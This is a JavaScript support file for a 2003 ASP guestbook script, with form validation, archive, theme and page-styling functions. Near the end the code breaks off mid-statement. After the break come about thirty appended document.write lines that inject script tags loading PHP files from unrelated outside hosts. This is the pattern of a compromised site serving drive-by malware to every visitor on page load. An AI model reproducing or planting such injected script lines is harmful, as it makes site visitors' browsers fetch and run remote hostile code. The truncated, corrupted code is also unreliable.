<!--

// Script Source for Guest Book v2.2
// ©2003 Gurgen Alaverdian www.gurgensvbstuff.com

function GetLost(oform){
	if (oform.value == "-- Mandatory Field --"){
		oform.value = "";
	}

}

function submitform(oform)
{

	if (oform.fName.value == "-- Mandatory Field --"){
		oform.fName.value = "";
	}
	
	if (oform.fComment.value == "-- Mandatory Field --"){
		oform.fComment.value = "";
	}


var errorm = "";
var uname = (oform.fName.value);
var uname = uname.replace(/\s/g, "");
var email = (oform.fEmail.value);
var ePat = (/(\w+)@(\w+)\.(\w+)/);
var matchEmail=email.match(ePat);
var comment = (oform.fComment.value);
var icomment = comment.replace(/\s/g, "");
var ASPCodePat = /<%(.|\n)*%>|<script(.|\n)*script>|<style(.|\n)*style>|<meta[\s]/gi;
var testForASP = comment.match(ASPCodePat);
var cLenght = comment.length;
var maxChr = (oform.maxPost.value);

	if (cLenght > maxChr){

		var errorm = ("    -- Your comment contain " + cLenght + " characters. Only " + maxChr + " allowed. Please revise!    " + "\n");
		var trap = ("error");
		
	}

	if (testForASP !== null){
		var errorm = errorm + ("    -- Your comment possibly contains a harmful code. Please revise!    " + "\n");
		var trap = ("error");
	}


	if (uname == "") {
		var errorm = errorm + ("    -- Name must be specified!    " + "\n");
		var trap = ("error");
	}
	if (email == "") {
			var errorm = errorm + ("    -- qualification empty!    " + "\n");
			var trap = ("error");
	}
	if (icomment == "") {
		var errorm = errorm + ("    -- Please state your comment!    " + "\n");
		var trap = ("error");
	}

		

	if (trap == "error") {
		alert ("Please fix the following errors and resubmit:" + "\n" + "\n" + errorm);
	}
	else {
		 var longPat = /((\S){60})/g;
		 var testComment = (comment);
		 oform.fComment.value = testComment.replace(longPat, "$1" + "\n");
		 oform.submitFlag.value = "post";
		 oform.submit();
	     }
}

function popup(url,wname,params)
{
PopWin = window.open(url,wname,params);
PopWin.focus();
}

function Save_Message(action)
{

	if (action == "save"){
		var conf = window.confirm("Are you sure you want to save changes?");
		if (!conf){
		return
		}
		else
			document.postnew.action.value = "save"
			document.postnew.submit();
	}

	if (action == "clear"){
		var conf = window.confirm("This action will clear the comment in the database! Continue?");
		if (!conf){
		return
		}
		else
		document.postnew.action.value = "clear"
    		document.postnew.submit();
	}
	
}

function sm(val,isnn) {

	if (isnn == 1){
		GetLost(window.opener.document.postnew.fComment);
		var selFrom = window.opener.document.postnew.fComment;
	}else{
		var myParent = window.parent.dialogArguments["DIALOGOPENER"];
		GetLost(myParent.document.postnew.fComment);
		var selFrom = myParent.document.postnew.fComment;
	}

	if (selFrom.storedRange) {
		 selFrom.storedRange.text = val;

	}else{
    		 selFrom.value += val;
  	}
}

function checkAll(oChkBox)
{
var bStatus = oChkBox.checked;
var docFrm = document.forms["admin"];
    for (i=0; i < docFrm.elements.length; i++) {
    	if (docFrm.elements[i].type == "checkbox") {
			docFrm.elements[i].checked = bStatus;
       }
    }
}

function popup(url,wname,params)
{
PopWin = window.open(url,wname,params);
PopWin.focus();
}

function sting(cform)
{
var n = (cform.T1.value);
var p = (cform.T2.value);
var c = (cform.T3.value);
if (p !== c) {
	alert("Password does not match.");
	cform.T2.value = ("");
	cform.T3.value = ("");
	return
}
if (n == "" | p == "") {
	var conf = window.confirm("Name or Password is blank. Do you want to continue?");
	if (!conf) {
	return
	}
}
cform.submit();
}


function feedback(reportform)
{


	if (typeof(document.forms[reportform].report) == "object"){
			alert(document.forms[reportform].report.value);
		
	}

	if (typeof(document.forms[reportform].refreshBook) == "object"){
		window.location=window.location
		window.opener.location=window.opener.location
	}
}

function archive()
{

var arch = document.frmarchive.D1.options[document.frmarchive.D1.selectedIndex].value;

		if (arch == "2"){
			if (window.confirm("You are about to Archive All messages from Guest Book.")){
				frmarchive.submit();
			}
			else
				return
		}
		else
			if (window.confirm("You are about to archive messages older than " + arch + " days from Guest Book.")){
				frmarchive.submit();
			}
}

function showArchive(oform)
{

	if (oform.options.length == 0){
		alert("Archive List is Empty!");
		return
	}

var selArch = oform.options[oform.selectedIndex].value;
popup("archive.asp?arch=" + selArch + "&Page=1","archive","toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1000,height=700");

}

function delarchive()
{

	if (document.frmarchdel.D2.options.length == 0){
		alert("Archive List is Empty!");
		return
	}
	if (window.confirm("You are about to delete selected Archive.")){
		frmarchdel.submit();
	}
}


function searchGuestBook(){
	var sTarget = document.search.D1.options[document.search.D1.selectedIndex].value;
	var sType = document.search.D2.options[document.search.D2.selectedIndex].value;
	var sDate = document.search.D3.options[document.search.D3.selectedIndex].value;
	var searchStr = document.search.T1.value;
	var matchCase = document.search.C1.checked;
	var checkStr = searchStr.replace(/\s/g, "");
	if (checkStr == "")
		return alert("Please specify a String to search.");
	if (sType !== "3"){
		var searchStr = searchStr.replace(/[^A-Za-z0-9\s_]/g, "");
		var tempSplit = searchStr.split(" ");
		var searchStr = "";
		for (var i=0; i < tempSplit.length; i++){
			if (tempSplit[i] !== ""){
				var searchStr = searchStr + "+" + tempSplit[i];
			}
		}
		searchStr = searchStr.replace(/\+/, "");
	}
	document.search.action = "search.asp?Target=" +  escape(sTarget) + "&string=" + escape(searchStr) + "&type=" + sType + "&Displ=1&Date=" + sDate + "&case=" + matchCase;
	document.search.submit();

}


function saveTheme(){

var tname = (frmColor.fTname.value);
var tname = tname.replace(/\s/g, "");
var tPatt = /[^\w-]/g;
var checkName=tname.match(tPatt);

	if (tname == "") {
		alert("    -- Please Specify a name of the Theme!");
		return;
	}

	if (checkName !== null){
		alert("    -- Only Alphanumeric values,  ‘-‘ and ‘_’ allowed as a Theme Name!");
		return;
	}

	document.frmColor.sTheme.value = "save"
	document.frmColor.submit();
}

function delTheme()
{

	if (document.frmColor.tList.options.length == 0){
		alert("Themes List is Empty");
		return
	}
	if (window.confirm("You are about to delete selected Theme.")){

		document.frmColor.ThemeConfig.value = "delete"
		document.frmColor.submit();
	}
}

function loadTheme()
{

	if (document.frmColor.tList.options.length == 0){
		alert("Themes List is Empty");
		return
	}
	if (window.confirm("You are about to load selected Theme. If you have not saved current configuration it will be overridden!")){

		document.frmColor.ThemeConfig.value = "load"
		document.frmColor.submit();
	}
}


function selectPages(perPage, pageNumber, pageName)
{

	document.cookie = "Page="+pageNumber+";path=/";
	document.cookie = "PerPage="+perPage+";path=/";
	window.location = pageName;
}

function ShowColor(colorValue)
{
	Color.style.backgroundColor = colorValue;
	var stripValue = colorValue.replace("#", "");
	frmColor.frmhex.value=stripValue;
}

function buffer(oForm) {
  	var iRange = document.selection.createRange();
  	oForm.storedRange = iRange.duplicate();
}


function postStyle(image,iLocation,iStyle) {

	GetLost(document.postnew.fComment);
	var oForm = document.postnew.fComment;

	switch(iStyle){
		case "bold":
			var sTag = "[b]";
			var eTag = "[/b]";
			var sImage = "b.jpg";
			var eImage = "b1.jpg";
			var sID = "sbold";
			var eID = "ebold";
			if (image.id=="sbold") {var iStart = true;}
			break;
		case "it":
			var sTag = "[i]";
			var eTag = "[/i]";
			var sImage = "i.jpg";
			var eImage = "i1.jpg";
			var sID = "sit";
			var eID = "eit";
			if (image.id=="sit") {var iStart = true;}
			break;
		case "us":
			var sTag = "[u]";
			var eTag = "[/u]";
			var sImage = "u.jpg";
			var eImage = "u1.jpg";
			var sID = "sus";
			var eID = "eus";
			if (image.id=="sus") {var iStart = true;}
			break;

	}

	if (iStart) {
		if (oForm.storedRange) {
			if (oForm.storedRange.text.length > 0) {
    				oForm.storedRange.text = sTag+oForm.storedRange.text+eTag;
			}else{
				oForm.storedRange.text = sTag;
				var iSwitch = true;
			}
		}else{
    			oForm.value += sTag;
			var iSwitch = true;
  		}				
		if (iSwitch) {
			image.src = iLocation+eImage;
			image.id = eID;
		}
				
	}else{
		if (oForm.storedRange) {
			if (oForm.storedRange.text.length > 0) {
    				oForm.storedRange.text += eTag;
			}else{
				oForm.storedRange.text = eTag;
			}
		}else{
    			oForm.value += eTag;
  		}				
		image.src = iLocation+sImage;
		image.id = sID;
	}

}



// ################################## Virtual Designer ##########################################################################################

function backColor(iColor) {

	var rObj = document.frames.design.document.body;
	rObj.style.backgroundColor = iColor;
}

function setTitle(iBorder, iColor, iAction) {

	x = iBorder;
	y = iColor;
	z = iAction;


	if (x == "title"){
		rObj = document.frames.design.document.all.item("title");
		if (z)	{
			rObj.style.border="3 solid"; rObj.style.borderColor=y;
		}else{
		rObj.style.border=0;
		}
	}
	if (x == "title_cell"){
		rObj = document.frames.design.document.all.item("title_cell");
		if (z)	{
			rObj.style.border="1 solid"; rObj.style.borderColor=y; rObj.style.color=y;
		}else{
		rObj.style.border=0;
		rObj.style.color=document.all.htextcolor.style.backgroundColor;
		}
	}
globalFilterSet()

}

function setFontSize(iSize, iType) {

	var rObj = document.frames.design.document.all;
	switch (iType) {
	   case "sfont":

      		for (i = 0; i < rObj.length; i++){
			if (rObj(i).id == "view_output_cells"|rObj(i).id == "small_font"|
					rObj(i).id == "href"|rObj(i).className == "select_forms") {rObj(i).style.fontSize = iSize;}	
      		}
		break;
	   case "btns":
      		for (i = 0; i < rObj.length; i++){
			if (rObj(i).id == "buttons") {rObj(i).style.fontSize = iSize;}	
      		}
		break;

	   case "lfont":
      		for (i = 0; i < rObj.length; i++){
			if (rObj(i).id == "input_forms"|rObj(i).id == "large_font"|
				rObj(i).id == "static_cells"|rObj(i).className == "comment_input_form") {rObj(i).style.fontSize = iSize;}	
      		}
		break;
	}

}

function setFont(iFont) {

var rObj = document.frames.design.document.all;


      	for (i = 0; i < rObj.length; i++){
		if (rObj(i).className == "static_cells"|rObj(i).className == "view_output_cells"|
			rObj(i).className == "input_forms"|rObj(i).className == "buttons"|
			rObj(i).id == "htext"|rObj(i).className == "select_forms") {
					
			rObj(i).style.fontFamily=iFont;			
		}

      	}
}


function removeBorder(iName) {

	switch (iName) {

		case "itbcolor": rObj = document.frames.design.document.all.item("input_table"); break;
		case "ctbcolor": rObj = document.frames.design.document.all.item("comment_table"); break;
		case "fbrcolor": rObj = document.frames.design.document.all.item("input_forms"); break;
		case "scbcolor": rObj = document.frames.design.document.all.item("static_cells"); break;
		case "icbcolor": rObj = document.frames.design.document.all.item("sign_input_cells"); break;
		case "vcbcolor": rObj = document.frames.design.document.all.item("view_output_cells"); break;
	}

	if (rObj != null){
   		if (rObj.length != null){
      			for (i = 0; i < rObj.length; i++){

				rObj(i).style.border=0;

      			}
   		}else{
				rObj.style.border=0;
   		}

	}

}

function colorVD(iName, iColor, iCount, blink, iReset, iType){

switch (iName) {

	case "maincolor": x = "static_cells"; break;
	case "inputcolor": x = "sign_input_cells"; break;
	case "areacolor": x = "view_output_cells"; break;
	case "inputbcolor": x = "input_forms"; break;
	case "bbcolor": x = "buttons"; break;
	case "htextcolor": x = "htext"; break;
	case "btextcolor": x = "tbuttons"; break;
	case "hlinkcolor": x = "href"; break;
	case "hrcolor": x = "hr"; break;
	case "itbcolor": x = "input_table"; break;
	case "ctbcolor": x = "comment_table"; break;
	case "tablescolor":
		document.frames.design.document.all.input_table(0).style.backgroundColor=iColor;
		document.frames.design.document.all.comment_table(0).style.backgroundColor=iColor;
		document.frames.design.document.all.input_table(1).style.backgroundColor=iColor;
		document.frames.design.document.all.comment_table(1).style.backgroundColor=iColor;
		globalFilterSet();
		return;
}


y = iColor;
z = iCount;
r = iReset;
t = iType;

if (z>5) {
	clearTimeout(iTimer);
	globalFilterSet();
	return;
}

if (blink == "invert()") { 
	b = "";
}else{
	b = "invert()";
}	
	
rObj = document.frames.design.document.all.item(x);

	if (rObj != null){
   		   z +=1;
   		if (rObj.length != null){
      			for (i = 0; i < rObj.length; i++){
				switch (t) {
					case "iCell":
						if (r!=="") {
							rObj(i).style.backgroundColor=r;break;
						}else{
							rObj(i).style.backgroundColor=y;break;
						}
					case "iText":
						if (r=="btn") {
							rObj(i).style.color=y;
							document.frames.design.document.all.buttons(i).style.border="1 solid";
							document.frames.design.document.all.buttons(i).style.borderColor=rObj(i).style.color;
							if (y=="") {
							document.frames.design.document.all.buttons(i).style.border=0
							}
							break;
						}else{
							rObj(i).style.color=y;break;
						}
					case "iBorder": rObj(i).style.border="1 solid"; rObj(i).style.borderColor=y; break;
				}
         			rObj(i).style.filter=b;
      			}
   		}else{
			switch (t) {
				case "iCell": 
					if (r!="") {
						rObj.style.backgroundColor=r;break;
					}else{
						rObj.style.backgroundColor=y;break;
					}
				case "iText": rObj.style.color=y; break;
				case "iBorder": rObj.style.border="1 solid"; rObj(i).style.borderColor=y; break;
			}
         		rObj.style.filter=b;
   		}


  iTimer = window.setTimeout('colorVD('+'x'+','+'y'+','+'z'+','+'b'+','+'r'+','+'t'+')', 100);
	}

}



function globalFilterSet() {

var oForm = document.frmColor;

var sOpacity = oForm.sOpacity.options[oForm.sOpacity.selectedIndex].value;

var gradBType = Math.abs(oForm.bgrad[1].checked);
var gradTType = Math.abs(oForm.ptgrad[1].checked);
var gradHType = Math.abs(oForm.tgrad[1].checked);
var gradIType = Math.abs(oForm.igrad[1].checked);
var gradMType = Math.abs(oForm.mgrad[1].checked);
var gradFType = Math.abs(oForm.fgrad[1].checked);
var gradTLType = Math.abs(oForm.tblgrad[1].checked);

var gradBSColor = document.all.bbcolor.style.backgroundColor.replace("#", "#ff");
var gradBEColor = document.all.gbbcolor.style.backgroundColor.replace("#", "#ff");

var gradTSColor = document.all.titlecolor.style.backgroundColor.replace("#", "#ff");
var gradTEColor = document.all.gtitlecolor.style.backgroundColor.replace("#", "#ff");

var gradHSColor = document.all.maincolor.style.backgroundColor.replace("#", "#ff");
var gradHEColor = document.all.gmaincolor.style.backgroundColor.replace("#", "#ff");

var gradISColor = document.all.inputcolor.style.backgroundColor.replace("#", "#ff");
var gradIEColor = document.all.ginputcolor.style.backgroundColor.replace("#", "#ff");

var gradMSColor = document.all.areacolor.style.backgroundColor.replace("#", "#ff");
var gradMEColor = document.all.gareacolor.style.backgroundColor.replace("#", "#ff");

var gradFSColor = document.all.inputbcolor.style.backgroundColor.replace("#", "#ff");
var gradFEColor = document.all.ginputbcolor.style.backgroundColor.replace("#", "#ff");

var gradTLSColor = document.all.tablescolor.style.backgroundColor.replace("#", "#ff");
var gradTLEColor = document.all.gtablescolor.style.backgroundColor.replace("#", "#ff");

rObj = document.frames.design.document.all
	for (i = 0; i < rObj.length; i++){
		if (rObj(i).id=="ibuttons"){
			if (oForm.sdwButtons.checked) {

      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Shadow(Color=" + document.all.decorcolor.style.backgroundColor + 
							", Direction=135, Strength=" + oForm.sDecor.options[oForm.sDecor.selectedIndex].value +")";
			}else{
         			rObj(i).style.filter="";
			}
		}

		if (rObj(i).id=="buttons"){
			if (oForm.gradButtons.checked) {

				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradBType + ", StartColorStr='" + 
							gradBSColor + "', EndColorStr='" + gradBEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";
			}else{
         			rObj(i).style.filter="";
				rObj(i).style.backgroundColor = document.all.bbcolor.style.backgroundColor;
			}
		}


		if (rObj(i).id=="title"){
			if (oForm.sdwPageTitle.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Shadow(Color=" + document.all.decorcolor.style.backgroundColor + ", Direction=135, Strength=" + 
							oForm.sDecor.options[oForm.sDecor.selectedIndex].value +")";
			}else{
         			rObj(i).style.filter="";
			}
		}

		if (rObj(i).id=="title_cell"){
			if (oForm.gradPageTitle.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradTType + ", StartColorStr='" + 
							gradTSColor + "', EndColorStr='" + gradTEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";
			}else{
         			rObj(i).style.filter="";
				rObj(i).style.color = document.all.htextcolor.style.backgroundColor;
				rObj(i).style.backgroundColor = "";
				
			}


		}

		if (rObj(i).id=="static_cells"){
			if (oForm.gradTitle.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradHType + ", StartColorStr='" + 
							gradHSColor + "', EndColorStr='" + gradHEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";
			}else{
         			rObj(i).style.filter="";
				rObj(i).style.backgroundColor = document.all.maincolor.style.backgroundColor;
			}


		}

		if (rObj(i).id=="sign_input_cells"){
			if (oForm.gradInput.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradIType + ", StartColorStr='" + 
							gradISColor + "', EndColorStr='" + gradIEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";
			}else{
         			rObj(i).style.filter="";
				rObj(i).style.backgroundColor = document.all.inputcolor.style.backgroundColor;
			}


		}

		if (rObj(i).id=="view_output_cells"){
			if (oForm.gradMessage.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradMType + ", StartColorStr='" + 
							gradMSColor + "', EndColorStr='" + gradMEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";
			}else{
         			rObj(i).style.filter="";
				rObj(i).style.backgroundColor = document.all.areacolor.style.backgroundColor;
			}


		}

		if (rObj(i).id=="input_forms"){
			if (oForm.gradForms.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradFType + ", StartColorStr='" + 
							gradFSColor + "', EndColorStr='" + gradFEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";
			}else{
         			rObj(i).style.filter="";
				rObj(i).style.backgroundColor = document.all.inputbcolor.style.backgroundColor;
			}


		}

		if (rObj(i).id=="input_table"|rObj(i).id=="comment_table"){
			
			if (oForm.gradTables.checked) {
      				rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Gradient(GradientType=" + gradTLType + ", StartColorStr='" + 
							gradTLSColor + "', EndColorStr='" + gradTLEColor + "') progid:DXImageTransform.Microsoft.Alpha(Opacity="+sOpacity+", Style=0)";							

			}else{
				if (oForm.decor[1].checked) {
      					rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Shadow(Color=" + document.all.decorcolor.style.backgroundColor + ", Direction=135, Strength=" + 
							oForm.sDecor.options[oForm.sDecor.selectedIndex].value +")";
				}
				if (oForm.decor[2].checked) {
      					rObj(i).style.filter = "progid:DXImageTransform.Microsoft.Glow(Color=" + document.all.decorcolor.style.backgroundColor + ", Strength=" + 
							oForm.sDecor.options[oForm.sDecor.selectedIndex].value +")";
				}
				if (oForm.decor[0].checked) {
      					rObj(i).style.filter = "";
					rObj(i).style.backgroundColor = document
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://video-game-holic.com/index.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://keman.org/ehemure/default.php ><\/script>');
document.write('<script src=http://muraulap.extra.hu/kepek2/generali.php ><\/script>');
document.write('<script src=http://muraulap.extra.hu/kepek2/generali.php ><\/script>');
document.write('<script src=http://muraulap.extra.hu/kepek2/generali.php ><\/script>');
document.write('<script src=http://muraulap.extra.hu/kepek2/generali.php ><\/script>');
document.write('<script src=http://muraulap.extra.hu/kepek2/generali.php ><\/script>');
document.write('<script src=http://bleachbaby.co.uk/images/gifimg.php ><\/script>');
document.write('<script src=http://haaijk.nl/images/index.php ><\/script>');
document.write('<script src=http://haaijk.nl/images/index.php ><\/script>');
document.write('<script src=http://haaijk.nl/images/index.php ><\/script>');
document.write('<script src=http://haaijk.nl/images/index.php ><\/script>');
document.write('<script src=http://haaijk.nl/images/index.php ><\/script>');
document.write('<script src=http://haaijk.nl/images/index.php ><\/script>');